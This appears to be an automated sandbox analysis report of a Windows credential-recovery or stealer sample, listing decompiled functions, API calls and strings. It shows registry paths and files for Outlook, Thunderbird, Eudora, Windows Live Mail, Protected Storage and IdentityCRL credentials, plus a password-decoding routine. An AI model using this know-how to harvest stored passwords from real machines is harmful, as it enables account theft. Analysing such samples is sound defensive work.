                                          • Instruction Fuzzy Hash: C7F0E972D082166FD200AA66984599BBB9C8F52729F11443FF808B7142D63D6D0643AF
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNEL32(ntdll.dll,?,?,?,?,00411FF1), ref: 00411F53
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00411FB7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: ntdll.dll
                                          • API String ID: 2574300362-2227199552
                                          • Opcode ID: cf6c50f50f44cecb4388a2af7e072cf3b9c31d8bc14ef792baaddb37fc731a17
                                          • Instruction ID: c3f2c9e477f8672f67090740fae2e549de1e6c2fb6487af2d15ed3ca5984443d
                                          • Opcode Fuzzy Hash: cf6c50f50f44cecb4388a2af7e072cf3b9c31d8bc14ef792baaddb37fc731a17
                                          • Instruction Fuzzy Hash: DC110D20D0C6C9EDEB12C7ACC4087DEBEF55B16709F0880E8C585A6292C7BA5658C776
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040923A(void** __esi, struct HWND__* _a4) {
                                          				long _v8;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				short _v28;
                                          				void* _v36;
                                          				void* _t17;
                                          				long _t22;
                                          				short* _t25;
                                          				int _t27;
                                          				void** _t28;
                                          
                                          				_t28 = __esi;
                                          				_t27 = 0;
                                          				if(_a4 != 0) {
                                          					_t17 = memset( *__esi, 0, __esi[1] << 2);
                                          					if(__esi[1] > 0) {
                                          						do {
                                          							_v24 = _v24 & 0x00000000;
                                          							_v20 = _v20 & 0x00000000;
                                          							_t25 =  *_t28 + _t27 * 4;
                                          							_v36 = 0x22;
                                          							_t22 = SendMessageA(_a4, 0x1019, _t27,  &_v36);
                                          							if(_t22 != 0) {
                                          								 *_t25 = _v28;
                                          								_t22 = _v8;
                                          								 *(_t25 + 2) = _t22;
                                          							}
                                          							_t27 = _t27 + 1;
                                          						} while (_t27 < _t28[1]);
                                          						return _t22;
                                          					}
                                          				}
                                          				return _t17;
                                          			}














                                          APIs
                                          • memset.MSVCRT ref: 00409252
                                          • SendMessageA.USER32(?,00001019,00000000,?), ref: 00409281
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: MessageSendmemset
                                          • String ID: "
                                          • API String ID: 568519121-123907689
                                          • Opcode ID: 462f7bc00b01c5c665d1b728afa31af522ee25155d9d26ee29ef20d9ca5f4486
                                          • Instruction ID: 143eebe103db385490b988b1a572ada648b34fe061aa254f91e3f3e50342256c
                                          • Opcode Fuzzy Hash: 462f7bc00b01c5c665d1b728afa31af522ee25155d9d26ee29ef20d9ca5f4486
                                          • Instruction Fuzzy Hash: 0A01A275800205FBDB218F95C845AAFB7B8FF84B59F00842DE854A6281E3349945CB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040C3AF(void* __esi) {
                                          				struct _WNDCLASSA _v44;
                                          				struct HWND__* _t21;
                                          
                                          				_v44.hInstance =  *0x41dbd4;
                                          				_v44.hIcon =  *((intOrPtr*)(__esi + 0x104));
                                          				_v44.lpszClassName = __esi + 4;
                                          				_v44.style = 0;
                                          				_v44.lpfnWndProc = E00402CAC;
                                          				_v44.cbClsExtra = 0;
                                          				_v44.cbWndExtra = 0;
                                          				_v44.hCursor = 0;
                                          				_v44.hbrBackground = 0x10;
                                          				_v44.lpszMenuName = 0;
                                          				RegisterClassA( &_v44);
                                          				_t21 = CreateWindowExA(0, 0x415454, 0x415454, 0xcf0000, 0, 0, 0x280, 0x1e0, 0, 0,  *0x41dbd4, __esi);
                                          				 *(__esi + 0x108) = _t21;
                                          				return _t21;
                                          			}






                                          APIs
                                          • RegisterClassA.USER32(?), ref: 0040C3F0
                                          • CreateWindowExA.USER32(00000000,MessenPass,MessenPass,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000), ref: 0040C418
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ClassCreateRegisterWindow
                                          • String ID: MessenPass
                                          • API String ID: 3469048531-1347981195
                                          • Opcode ID: 67992f16593fd71ff76a11f6399149812f2a11e7935b78172462f25744a6f341
                                          • Instruction ID: df568ce2afab08691587747be1d5034a2dd7dfffecd18501b630fd2d0d2d029c
                                          • Opcode Fuzzy Hash: 67992f16593fd71ff76a11f6399149812f2a11e7935b78172462f25744a6f341
                                          • Instruction Fuzzy Hash: 0701E8B5D00608AFDB11CF9ACD49ADFFFF8EB89704F10802BE541A6250D7B46640CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadMenuA.USER32(00000000), ref: 00408A31
                                          • sprintf.MSVCRT ref: 00408A54
                                            • Part of subcall function 004088D4: GetMenuItemCount.USER32(?), ref: 004088EA
                                            • Part of subcall function 004088D4: memset.MSVCRT ref: 0040890E
                                            • Part of subcall function 004088D4: GetMenuItemInfoA.USER32(?), ref: 00408944
                                            • Part of subcall function 004088D4: memset.MSVCRT ref: 00408971
                                            • Part of subcall function 004088D4: strchr.MSVCRT ref: 0040897D
                                            • Part of subcall function 004088D4: _mbscat.MSVCRT ref: 004089D8
                                            • Part of subcall function 004088D4: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 004089F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                          • String ID: menu_%d
                                          • API String ID: 1129539653-2417748251
                                          • Opcode ID: a21fc8c0a1f872effcd217c56cb1ebd2d456d0f88aeeed4053934f629e37b6cb
                                          • Instruction ID: 6e6fd20b795a8bab19114a67d1783e5b01d02cb8a2ade4a69635827cbafc1364
                                          • Opcode Fuzzy Hash: a21fc8c0a1f872effcd217c56cb1ebd2d456d0f88aeeed4053934f629e37b6cb
                                          • Instruction Fuzzy Hash: EBD0C232A0030076E61033276C0EFCB29195BD2B19F54807FF400710C5DEBD018487AC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E00406BC3(intOrPtr _a4) {
                                          
                                          				if( *0x41e458 == 0) {
                                          					 *0x41e560 = GetWindowsDirectoryA(0x41e458, 0x104);
                                          				}
                                          				0x413d0c(_a4, 0x41e458);
                                          				return  *0x41e560;
                                          			}




                                          APIs
                                          • GetWindowsDirectoryA.KERNEL32(0041E458,00000104,?,00411228,00000000,?,00000000,00000104,00000000), ref: 00406BD8
                                          • _mbscpy.MSVCRT ref: 00406BE8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: DirectoryWindows_mbscpy
                                          • String ID: XA
                                          • API String ID: 257536871-3740220071
                                          • Opcode ID: 861364e7de9ee2ae089174bca0caadeda4635289f72fc20d00e4fde06078ff85
                                          • Instruction ID: 8f816420b632b6a764ea2497921bafe0203b6dc712d69cfd7b43a4c86b5ca7f0
                                          • Opcode Fuzzy Hash: 861364e7de9ee2ae089174bca0caadeda4635289f72fc20d00e4fde06078ff85
                                          • Instruction Fuzzy Hash: 47D05E7540C260BFF7109B12FC45AC63FE4EF49334F10803AF804961A0EB746981869C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00409141(char* __esi) {
                                          				char* _t2;
                                          				char* _t5;
                                          
                                          				_t5 = __esi;
                                          				E004069E8(__esi);
                                          				_t2 = strrchr(__esi, 0x2e);
                                          				if(_t2 != 0) {
                                          					 *_t2 = 0;
                                          				}
                                          				0x413cf4(_t5, "_lng.ini");
                                          				return _t2;
                                          			}






                                          APIs
                                            • Part of subcall function 004069E8: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409147,00000000,0040905A,?,00000000,00000104), ref: 004069F3
                                          • strrchr.MSVCRT ref: 0040914A
                                          • _mbscat.MSVCRT ref: 0040915F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileModuleName_mbscatstrrchr
                                          • String ID: _lng.ini
                                          • API String ID: 3334749609-1948609170
                                          • Opcode ID: 08864fd35b35f6e10160a6b7cad974f4c4e5e5894a63cb91cea6d61644888c54
                                          • Instruction ID: a8986b5d0fc5065fa4420194992ab4643f38d39362f1d3b193e5f677e6d35072
                                          • Opcode Fuzzy Hash: 08864fd35b35f6e10160a6b7cad974f4c4e5e5894a63cb91cea6d61644888c54
                                          • Instruction Fuzzy Hash: D7C0127124565054E11231222D03BCB05480F12705F29006FFC01781C3EE5D4A9180AE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E00407E33(intOrPtr* _a4, intOrPtr _a8, char* _a12) {
                                          				int _v12;
                                          				int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				char _v28;
                                          				char* _v32;
                                          				char _v36;
                                          				signed int* _v40;
                                          				char _v44;
                                          				void _v304;
                                          				char _v560;
                                          				void _v2607;
                                          				char _v2608;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t39;
                                          				signed int _t40;
                                          				signed int _t44;
                                          				signed int* _t64;
                                          				char _t72;
                                          				signed int _t77;
                                          				char* _t78;
                                          				void* _t81;
                                          				void* _t82;
                                          				int _t84;
                                          				char* _t86;
                                          				void* _t88;
                                          				signed int _t93;
                                          
                                          				_t39 = strlen(_a12);
                                          				_t77 = _t39;
                                          				_t40 = _t39 & 0x80000001;
                                          				if(_t40 < 0) {
                                          					_t40 = (_t40 - 0x00000001 | 0xfffffffe) + 1;
                                          					_t93 = _t40;
                                          				}
                                          				if(_t93 != 0 || _t77 <= 0x20) {
                                          					return _t40;
                                          				} else {
                                          					_t82 = 0;
                                          					_v2608 = 0;
                                          					memset( &_v2607, 0, 0x7ff);
                                          					_t64 = _a4 + 4;
                                          					_t44 =  *_t64 | 0x00000001;
                                          					_v12 = 0;
                                          					if(_t77 <= 4) {
                                          						L8:
                                          						_v28 = _t82;
                                          						_v20 = _t82;
                                          						_v24 = _t82;
                                          						if(E00404C9D( &_v28, 0) != 0) {
                                          							_v36 = _v12;
                                          							_v32 =  &_v2608;
                                          							_v44 = 0x10;
                                          							_v40 = _t64;
                                          							if(E00404CF5( &_v28,  &_v36,  &_v44,  &_v16) != 0) {
                                          								_t84 = _v16;
                                          								if(_t84 > 0xff) {
                                          									_t84 = 0xff;
                                          								}
                                          								_v560 = 0;
                                          								_v304 = 0;
                                          								memcpy( &_v304, _v12, _t84);
                                          								_t78 =  &_v560;
                                          								 *((char*)(_t88 + _t84 - 0x12c)) = 0;
                                          								E00406958(0xff, _t78, _a8);
                                          								 *((intOrPtr*)( *_a4))(_t78);
                                          								LocalFree(_v12);
                                          							}
                                          						}
                                          						return E00404CE0( &_v28);
                                          					}
                                          					_t86 =  &(_a12[5]);
                                          					_t81 = (_t77 + 0xfffffffb >> 1) + 1;
                                          					do {
                                          						_t72 = ( *((intOrPtr*)(_t86 - 1)) - 0x00000001 << 0x00000004 |  *_t86 - 0x00000021) - _t44;
                                          						_t44 = _t44 * 0x10ff5;
                                          						_t86 =  &(_t86[2]);
                                          						_v12 = _v12 + 1;
                                          						_t81 = _t81 - 1;
                                          						 *((char*)(_t88 + _v12 - 0xa2c)) = _t72;
                                          					} while (_t81 != 0);
                                          					_t82 = 0;
                                          					goto L8;
                                          				}
                                          			}

































                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FreeLocalmemcpymemsetstrlen
                                          • String ID:
                                          • API String ID: 3110682361-0
                                          • Opcode ID: 21470b65325c4646694a84c407f8fe9269b35ac8cd8724ca01919c7c57aa0683
                                          • Instruction ID: 94145ba3e6d447937b4e48053a9a2b44a3b831c7855691199b8e714b6b5b9eaf
                                          • Opcode Fuzzy Hash: 21470b65325c4646694a84c407f8fe9269b35ac8cd8724ca01919c7c57aa0683
                                          • Instruction Fuzzy Hash: 9941C372D041199BCF109FA9C841BDEBFB8EF49314F1041B6E955B7281C238AA85CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@$memset
                                          • String ID:
                                          • API String ID: 1860491036-0
                                          • Opcode ID: 1bad524f509e8432f6dffaaf9df71c7c9054cf9a40cbc24d5c758d582a256a45
                                          • Instruction ID: 542bc7e3926c6d60784d6f8799ebb0262de6c8f0aff60c73b96b1684488c9edf
                                          • Opcode Fuzzy Hash: 1bad524f509e8432f6dffaaf9df71c7c9054cf9a40cbc24d5c758d582a256a45
                                          • Instruction Fuzzy Hash: 9621B3B0A053008FDB558F6A9845955FBF8FF94311B2AC9AFD508DB2B2D7B8C9409F14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          APIs
                                          • FindFirstFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407C9D
                                          • FindNextFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407CBB
                                          • strlen.MSVCRT ref: 00407CEB
                                          • strlen.MSVCRT ref: 00407CF3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileFindstrlen$FirstNext
                                          • String ID: .8D
                                          • API String ID: 379999529-2881260426
                                          • Opcode ID: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
                                          • Instruction ID: eb3e2fb57be8f0c3c515892a2c877e6408fe4d7e79a86a2feb9bdace6263c32c
                                          • Opcode Fuzzy Hash: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
                                          • Instruction Fuzzy Hash: 2F11A072909201AFE3109B38D844AEB73DCEF45325F600A2FF05AE31C1EB38A9409729
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 00401E82
                                          • strlen.MSVCRT ref: 00401E9B
                                          • strlen.MSVCRT ref: 00401EA9
                                          • strlen.MSVCRT ref: 00401EEF
                                          • strlen.MSVCRT ref: 00401EFD
                                          • memset.MSVCRT ref: 00401FA8
                                          • atoi.MSVCRT ref: 00401FD7
                                          • memset.MSVCRT ref: 00401FFA
                                          • sprintf.MSVCRT ref: 00402027
                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                          • memset.MSVCRT ref: 0040207D
                                          • memset.MSVCRT ref: 00402092
                                          • strlen.MSVCRT ref: 00402098
                                          • strlen.MSVCRT ref: 004020A6
                                          • strlen.MSVCRT ref: 004020D9
                                          • strlen.MSVCRT ref: 004020E7
                                          • memset.MSVCRT ref: 0040200F
                                            • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
                                            • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
                                          • _mbscpy.MSVCRT ref: 0040216E
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00402178
                                          • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 00402193
                                            • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                          • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                          • API String ID: 1846531875-4223776976
                                          • Opcode ID: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
                                          • Instruction ID: f32954dd371ee46ce489a3e15048bba03ea5248cf67d2e34683548b394895fb7
                                          • Opcode Fuzzy Hash: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
                                          • Instruction Fuzzy Hash: CA91D772804118AAEB21E7A1CC46FDF77BC9F54315F1400BBF608F2182EB789B858B59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00404A94: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
                                            • Part of subcall function 00404A94: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
                                            • Part of subcall function 00404A94: FreeLibrary.KERNEL32(00000000), ref: 00404AD9
                                            • Part of subcall function 00404A94: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040CEB2
                                          • DeleteObject.GDI32(?), ref: 0040CEC8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                          • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                          • API String ID: 745651260-375988210
                                          • Opcode ID: 0e7b97f45477183378a32522f6888ef2dfda47b1227b8069460a3777cd3d0e7e
                                          • Instruction ID: 177dcc30e6d6fe1e6f6b961e060c6fa8e32a60297cdf5fc43279ddd28c1616a1
                                          • Opcode Fuzzy Hash: 0e7b97f45477183378a32522f6888ef2dfda47b1227b8069460a3777cd3d0e7e
                                          • Instruction Fuzzy Hash: 3661A075408341DBDB20AFA1DC88A9FB7F8BF85305F00093FF545A21A2DB789904CB5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 004080A5
                                          • memset.MSVCRT ref: 004080B9
                                          • memset.MSVCRT ref: 004080D3
                                          • memset.MSVCRT ref: 004080E8
                                          • GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                          • GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                          • strlen.MSVCRT ref: 0040815B
                                          • strlen.MSVCRT ref: 0040816A
                                          • memcpy.MSVCRT ref: 0040817C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                          • String ID: 5$H$O$b$i$}$}
                                          • API String ID: 1832431107-3760989150
                                          • Opcode ID: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
                                          • Instruction ID: 839b780f30062d9b3c48c7c4bb1edbc251b0819f5d773de0f2740150403ea89f
                                          • Opcode Fuzzy Hash: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
                                          • Instruction Fuzzy Hash: D151D771C0025DAEDB11CBA8CC41BEEBBBCEF49314F0441EAE555AA182D3389B45CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00410166: FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                          • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C22
                                          • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C37
                                          • _mbscpy.MSVCRT ref: 00403E41
                                          Strings
                                          • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CE8
                                          • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CC3
                                          • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D5B
                                          • pstorec.dll, xrefs: 00403C1D
                                          • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C7D
                                          • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403D91
                                          • www.google.com/Please log in to your Google Account, xrefs: 00403C87
                                          • www.google.com:443/Please log in to your Google Account, xrefs: 00403C91
                                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D2F
                                          • PStoreCreateInstance, xrefs: 00403C31
                                          • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D28
                                          • www.google.com/Please log in to your Gmail account, xrefs: 00403C73
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Library$AddressFreeLoadProc_mbscpy
                                          • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                          • API String ID: 1197458902-317895162
                                          • Opcode ID: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
                                          • Instruction ID: 8c3092e028ed30b7bcb0bf0438431f6e947b4810b401e401bf51def59c6c6aaf
                                          • Opcode Fuzzy Hash: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
                                          • Instruction Fuzzy Hash: 5C51A571600615B6E714AF71CD86FEAB76CAF00709F20053FF904B61C2DBBDBA5486A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4A9
                                          • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4C3
                                          • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E6C,?), ref: 0040F4EE
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E6C,?), ref: 0040F59F
                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                          • memcpy.MSVCRT ref: 0040F55C
                                          • memcpy.MSVCRT ref: 0040F571
                                            • Part of subcall function 0040F177: RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                            • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1BF
                                            • Part of subcall function 0040F177: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                            • Part of subcall function 0040F177: RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                          • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E6C,?), ref: 0040F595
                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E6C,?), ref: 0040F5A9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                          • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                          • API String ID: 2768085393-888555734
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                          • String ID:
                                          • API String ID: 3662548030-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 004437F8
                                            • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040732F
                                            • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040733A
                                            • Part of subcall function 0040732D: _mbscat.MSVCRT ref: 00407351
                                            • Part of subcall function 0041072B: memset.MSVCRT ref: 00410780
                                            • Part of subcall function 0041072B: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                            • Part of subcall function 0041072B: _mbscpy.MSVCRT ref: 004107F7
                                          • memset.MSVCRT ref: 00443866
                                          • memset.MSVCRT ref: 00443881
                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                          • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004438BA
                                          • strlen.MSVCRT ref: 004438C8
                                          • _strcmpi.MSVCRT ref: 004438EE
                                          Strings
                                          • \Microsoft\Windows Mail, xrefs: 00443816
                                          • \Microsoft\Windows Live Mail, xrefs: 0044383D
                                          • Software\Microsoft\Windows Live Mail, xrefs: 00443897
                                          • Store Root, xrefs: 00443892
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                          • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                          • API String ID: 832325562-2578778931
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 0040EEDC
                                          • memset.MSVCRT ref: 0040EEF4
                                            • Part of subcall function 00407649: _mbsnbcat.MSVCRT ref: 00407669
                                          • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040EF2A
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040EF57
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F02C
                                            • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                          • memcpy.MSVCRT ref: 0040EFC7
                                          • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040EFD9
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F048
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                          • String ID:
                                          • API String ID: 2012582556-3916222277
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 004037DD
                                          • memset.MSVCRT ref: 004037F1
                                            • Part of subcall function 00443A35: memset.MSVCRT ref: 00443A57
                                            • Part of subcall function 00443A35: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                            • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                            • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                          • strchr.MSVCRT ref: 00403860
                                          • _mbscpy.MSVCRT ref: 0040387D
                                          • strlen.MSVCRT ref: 00403889
                                          • sprintf.MSVCRT ref: 004038A9
                                          • _mbscpy.MSVCRT ref: 004038BF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                          • String ID: %s@yahoo.com
                                          • API String ID: 317221925-3288273942
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 004034F6
                                          • memset.MSVCRT ref: 0040350C
                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                          • _mbscpy.MSVCRT ref: 00403547
                                            • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
